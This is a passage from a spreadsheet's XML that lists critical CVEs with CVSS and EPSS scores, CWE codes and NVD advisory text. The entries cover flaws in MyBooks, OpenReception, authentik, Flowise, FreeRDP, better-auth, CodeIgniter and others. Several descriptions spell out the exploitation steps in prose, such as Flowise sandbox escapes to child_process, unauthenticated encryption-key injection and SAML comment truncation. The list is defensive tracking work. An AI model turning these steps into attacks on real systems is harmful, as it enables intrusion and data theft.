with 'ipv4 . port' key, i.e.  nft -f foo.
This works.  Then, it reloads the set after a flush:
(echo flush set t s; cat foo) | nft -f -
This is expected to work, because its the same set after all and it was
already loaded once.
But with avx2, this fails: nft reports a clashing element.
The reported clash is of following form:
    We successfully re-inserted
      a . b
      c . d
Then we try to insert a . d
avx2 finds the already existing a . d, which (due to 'flush set') is marked
as invalid in the new generation.  It skips the element and moves to next.
Due to incorrect masking, the skip-step finds the next matching
element *only considering the first field*,
i.e. we return the already reinserted "a . b", even though the
last field is different and the entry should not have been matched.
No such error is reported for the generic c implementation (no avx2) or when
the last field has to use the 'nft_pipapo_avx2_lookup_slow' fallback.
Bisection points to
7711f4bb4b36 ("netfilter: nft_set_pipapo: fix range overlap detection")
but that fix merely uncovers this bug.
Before this commit, the wrong element is returned, but erronously
reported as a full, identical duplicate.
The root-cause is too early return in the avx2 match functions.
When we process the last field, we should continue to process data
until the entire input size has been consumed to make sure no stale
bits remain in the map.</t>
        </is>
      </c>
      <c r="M370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43114</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45272</t>
        </is>
      </c>
      <c r="C371" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D371" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E371" s="5" t="inlineStr"/>
      <c r="F371" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G371" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L371" s="5" t="inlineStr">
        <is>
          <t>MyBooks is an enhanced and easy-to-use personal ebook management web server also known as Talebook. In 3.41.2 and earlier, the AdminSettings.post handler in webserver/handlers/admin.py accepts SOCIAL_AUTH key names without validating quotes or newline characters, and SettingsLoader.dumpfile in webserver/loader.py concatenates those names into the generated Python source file auto.py without escaping them. An administrator can submit a crafted SOCIAL_AUTH key name that closes the settings dictionary and injects arbitrary Python statements. The application later executes those statements because SettingsLoader.loadfile imports auto.py as a module, and setting autoreload to true invokes restart_async so a process supervisor restarts the service and triggers the import. Successful exploitation executes commands with the privileges of the application service account and can disclose data, modify files, establish persistence, or disrupt the service. Related authorization and registration vulnerabilities can reduce the effective privilege requirement in a chained attack, but the standalone vulnerability requires administrator access. This issue is fixed in version 3.42.0.</t>
        </is>
      </c>
      <c r="M371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45272</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48088</t>
        </is>
      </c>
      <c r="C372" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D372" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E372" s="5" t="inlineStr"/>
      <c r="F372" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.4, the route `POST /api/tenants/{tenantId}/staff/{staffId}/crypto` accepts and stores attacker-controlled ML-KEM-768 public keys against any tenant on the platform without authentication. The handler logs an "Unauthorized crypto key storage attempt" warning when neither a session nor a registration cookie is present, then proceeds to insert the row regardless. The platform's E2E claim that "even administrators cannot view sensitive information" is broken: any unauthenticated network attacker can register themselves as an additional encryption recipient for any tenant's future patient appointments. A second variant of the bug suppresses the unauthorized-warning log entry. The Zod schema makes the `email` field optional. When the request body omits `email` and the request carries no registration cookie, the comparison `registrationEmail === email` becomes `undefined === undefined`, which evaluates to `true`. The handler treats the request as a legitimate registration flow, skips the warning entirely, and stores the row. Successful storage is still recorded as an `[info]` log line, but the security-relevant warning that operators are most likely to monitor or alert on is gone. The `staff_crypto` table has no unique constraint on `user_id`, so an arbitrary number of attacker rows can coexist for the same staff identifier and all return as `is_active=true`. The supplied `staffId` does not need to match any existing user or pending invite. Schema validation on `passkeyId`, `publicKey`, and `privateKeyShare` is also weak: the literal string `&lt;placeholder-base64&gt;` was accepted, indicating no length, format, or cryptographic-validity check beyond field presence. This weakness is independent of the auth bypass but compounds it: a poisoned directory can also be filled with malformed entries that break legitimate booking flows. The injected key is consumed by the public booking flow. After completing the unauthenticated `bootstrap-challenge` and `bootstrap-verify` ceremony as a "patient", the resulting `bookingAccessToken` is accepted by `GET /api/tenants/{id}/appointments/staff-public-keys`, which returns the attacker-controlled keys alongside any legitimate ones. A new appointment encrypts its tunnel key with ML-KEM to all listed recipients, so the attacker becomes a co-recipient of the encryption and can decapsulate the tunnel key with the matching secret. From there, all appointment payloads for that booking are decryptable. Version 1.0.4 patches the issue.</t>
        </is>
      </c>
      <c r="M372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48088</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50561</t>
        </is>
      </c>
      <c r="C373" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D373" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E373" s="5" t="inlineStr"/>
      <c r="F373" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L373" s="5" t="inlineStr">
        <is>
          <t>Yuxi is a large-model-based intelligent knowledge base and knowledge graph agent development platform. Prior to version 0.6.2, the project's authentication mechanism contains a flaw. In affected versions, the system does not sufficiently validate the identity token in the Authorization header — only performing a validity check. This allows an administrator token generated in another deployment instance or local testing environment to be used to access the backend management interfaces of a different affected instance. An attacker who obtains or constructs an acceptable administrator Authorization token may bypass normal login authentication and gain administrator privileges. This vulnerability could allow an attacker to access system configurations, invoke backend management APIs, create administrator accounts, and ultimately take over the system backend. This issue has been fixed in version 0.6.2. Before upgrading, users are advised to implement the following temporary measures: Set the environment variable `JWT_SECRET_KEY` to a non-default value, and configure a unique, sufficiently strong JWT/authentication key for each deployment instance; and/or avoid exposing backend management interfaces directly to the public network.</t>
        </is>
      </c>
      <c r="M373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50561</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52777</t>
        </is>
      </c>
      <c r="C374" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D374" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E374" s="5" t="inlineStr"/>
      <c r="F374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-502</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, there is an authenticated PHP object injection vulnerability in BazarImportAction via unserialize. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52777</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57580</t>
        </is>
      </c>
      <c r="C375" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D375" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E375" s="5" t="inlineStr"/>
      <c r="F375" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr">
        <is>
          <t>authentik is an open-source identity provider. Prior to 2026.2.6 and 2026.5.5, an inbound SAML Source configured with the non-default USERNAME_LINK or EMAIL_LINK user-matching mode interprets an XML comment in a NameID differently from the identity provider's signed assertion. An attacker with an account on the source identity provider who can set the account's NameID can inject an XML comment that truncates the value used by authentik to the text before the comment while the signed assertion remains valid. A crafted NameID can therefore truncate to a victim's username or email and bind the attacker's external identity to the victim's existing account. This grants full takeover without the victim's password or the identity provider's private key, and the malicious link persists so later logins succeed without the comment. Sources using the default unique-identifier matching mode and authentik's outbound SAML Provider role are not affected. This issue is fixed in versions 2026.2.6 and 2026.5.5.</t>
        </is>
      </c>
      <c r="M375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57580</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61410</t>
        </is>
      </c>
      <c r="C376" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D376" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E376" s="5" t="inlineStr"/>
      <c r="F376" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Missing Authorization vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution. This vulnerability is considered critical because it allows an attacker to execute commands remotely on a target system by sending a specially crafted request to the application, bypassing intended restrictions on code execution.Dell recommends customers to upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="M376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61410</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6223</t>
        </is>
      </c>
      <c r="C377" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D377" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E377" s="5" t="inlineStr"/>
      <c r="F377" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L377" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of excessive authentication attempts vulnerability in Bahçelievler Muncipality BiHayat App allows Authentication Bypass.
This issue affects BiHayat App: from 2.1.7 through 07092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6223</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62668</t>
        </is>
      </c>
      <c r="C378" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D378" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E378" s="5" t="inlineStr"/>
      <c r="F378" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L378" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.6, the Grav API plugin WebhookController.php accepts webhook URLs after only FILTER_VALIDATE_URL syntax validation, and WebhookDispatcher.php initializes cURL without CURLOPT_PROTOCOLS or CURLOPT_REDIR_PROTOCOLS restrictions. An account with api.webhooks.write can submit file, dict, gopher, private-network, or link-local targets, retrieve local files and delivery response bodies, and pivot requests to internal services or cloud metadata endpoints. This issue is fixed in version 1.0.6.</t>
        </is>
      </c>
      <c r="M378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62668</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63221</t>
        </is>
      </c>
      <c r="C379" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D379" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E379" s="5" t="inlineStr"/>
      <c r="F379" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr">
        <is>
          <t>CodeIgniter is a PHP full-stack web framework. From 4.3.0 through 4.7.3, Query Builder deleteBatch() substitutes bound values from where() conditions into generated SQL while ignoring their escape flags, allowing user-controlled condition values to be interpreted as SQL. This affects only the deleteBatch() code path. Regular delete() operations escape where() binds correctly. This issue is fixed in version 4.7.4.</t>
        </is>
      </c>
      <c r="M379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63221</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67305</t>
        </is>
      </c>
      <c r="C380" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D380" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E380" s="5" t="inlineStr"/>
      <c r="F380" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G380" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H380" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I380" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L380" s="5" t="inlineStr">
        <is>
          <t>FreeRDP Windows client before 3.29.0 contains a heap buffer overflow vulnerability in the clipboard virtual channel when processing CLIPRDR_FILE_CONTENTS_RESPONSE PDUs without validating the server-provided size against the destination buffer. A malicious RDP server can send a response with a data payload significantly larger than requested, causing arbitrary heap memory corruption that may enable remote code execution when a user performs a paste operation.</t>
        </is>
      </c>
      <c r="M380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67305</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67330</t>
        </is>
      </c>
      <c r="C381" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D381" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E381" s="5" t="inlineStr"/>
      <c r="F381" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L381" s="5" t="inlineStr">
        <is>
          <t>@better-auth/scim (a better-auth plugin) versions &gt;= 1.4.0-beta.27 through &lt;= 1.6.21 and &gt;= 1.7.0-beta.0 through &lt;= 1.7.0-beta.9 contain an authorization bypass. SCIM token issuance did not reject provider IDs already used by existing SSO, SAML, OIDC, generic OAuth, or social account providers, and the same logical provider ID was used for both SCIM provider configuration and account ownership. An authenticated user could mint a SCIM token whose provider ID collided with an existing provider namespace, causing SCIM user routes to resolve account rows the token never provisioned. This allowed listing, reading, updating (including rewriting global profile/email fields without uniqueness checks), and deleting global user accounts and sessions, resulting in account takeover and unauthorized deprovisioning. Fixed in 1.6.22 and 1.7.0-beta.10 (1.7.0-rc.0).</t>
        </is>
      </c>
      <c r="M381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67330</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67336</t>
        </is>
      </c>
      <c r="C382" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D382" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E382" s="5" t="inlineStr"/>
      <c r="F382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L382" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.6.11 contain insecure cryptographic defaults in the oidcProvider and mcp plugins that advertise the none algorithm and accept plain PKCE by default. Attackers can exploit algorithm negotiation to accept unsigned tokens or intercept authorization codes when PKCE plain is used instead of the required S256 method.</t>
        </is>
      </c>
      <c r="M382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67336</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6881</t>
        </is>
      </c>
      <c r="C383" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D383" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E383" s="5" t="inlineStr"/>
      <c r="F383" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L383" s="5" t="inlineStr">
        <is>
          <t>A SQL Injection in the Giving Reports functionality in Ellucian Advance Web and Legacy Advance allows an authenticated attacker to extract sensitive information from databases via a crafted SQL query in the class credit field.
This issue affects Advance Web: all versions; Legacy Advance: all versions.
Ellucian CRM Advance is not impacted.</t>
        </is>
      </c>
      <c r="M383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6881</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69254</t>
        </is>
      </c>
      <c r="C384" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D384" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E384" s="5" t="inlineStr"/>
      <c r="F384" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G384" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L384" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, executeJavaScriptCode() accepted caller-provided nodeVMOptions and merged them over the default NodeVM security settings in packages/components/src/utils.ts. An authenticated attacker reaching packages/server/src/routes/node-custom-functions/index.ts could run a custom function that imported flowise-components/dist/src/utils.js, called executeJavaScriptCode() again with nodeVMOptions.require.builtin set to allow all built-in modules, and then required child_process to execute arbitrary system commands as root on the Flowise server. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69254</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69256</t>
        </is>
      </c>
      <c r="C385" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D385" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E385" s="5" t="inlineStr"/>
      <c r="F385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G385" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L385" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent node allowed users to provide Python code that is executed through pyodide; although a denylist blocked dangerous Python constructs, pandas.read_pickle() could deserialize a pickled payload and achieve code execution without matching the denied words. The affected file is flowise-components/nodes/agents/CSVAgent/CSVAgent.ts, where user-supplied customReadCSVFunc is evaluated as pd.${customReadCSVFunc}. An authenticated user who can create or modify a chatflow can add a CSV Agent, place a malicious read_pickle payload in the Additional Parameters, save the chatflow, and trigger /api/v1/prediction/&lt;UUID&gt; to execute commands. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69256</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69259</t>
        </is>
      </c>
      <c r="C386" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D386" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E386" s="5" t="inlineStr"/>
      <c r="F386" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G386" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L386" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the SQLite Record Manager node in packages/components/nodes/recordmanager/SQLiteRecordManager/SQLiteRecordManager.ts accepted user-controlled additionalConfig and spread it after the intended database setting, allowing additionalConfig.database to overwrite the SQLite database path. An authenticated attacker using the published Docker image, which ran as root, could write a SQLite database to paths such as /etc/chromium/exploit.conf; by controlling the table name and namespace value, the attacker could place shell syntax into the database file and trigger execution when Puppeteer launched Chromium and sourced /etc/chromium/*.conf. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69259</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69264</t>
        </is>
      </c>
      <c r="C387" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D387" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E387" s="5" t="inlineStr"/>
      <c r="F387" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G387" s="5" t="inlineStr">
        <is>
          <t>java, node.js, python</t>
        </is>
      </c>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L387" s="5" t="inlineStr">
        <is>
          <t>Prior to 3.1.3, Flowise CSVAgent interpolates an attacker-controlled segment of the csvFile data URI directly into a Python source-code template that is then executed by Pyodide. Because Pyodide is loaded with the default js bridge to globalThis, which on Node.js exposes eval and dynamic import, the attacker can break out of the Python string literal, hand a JavaScript string to js.eval, dynamically import Node built-in modules such as fs and child_process, and execute arbitrary file I/O or OS commands as the Flowise process. The two validator paths around this code, validatePythonCodeForDataFrame and validateCustomReadCSVFunction, are never applied to the bootstrap template. A workspace user with chatflows:create or agentflows/chatflows update permission can plant a CSV Agent node with a crafted csvFile; once the chatflow is exposed via POST /api/v1/prediction/:id, any unauthenticated request triggers host remote code execution. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69264</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72841</t>
        </is>
      </c>
      <c r="C388" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D388" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E388" s="5" t="inlineStr"/>
      <c r="F388" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L388" s="5" t="inlineStr">
        <is>
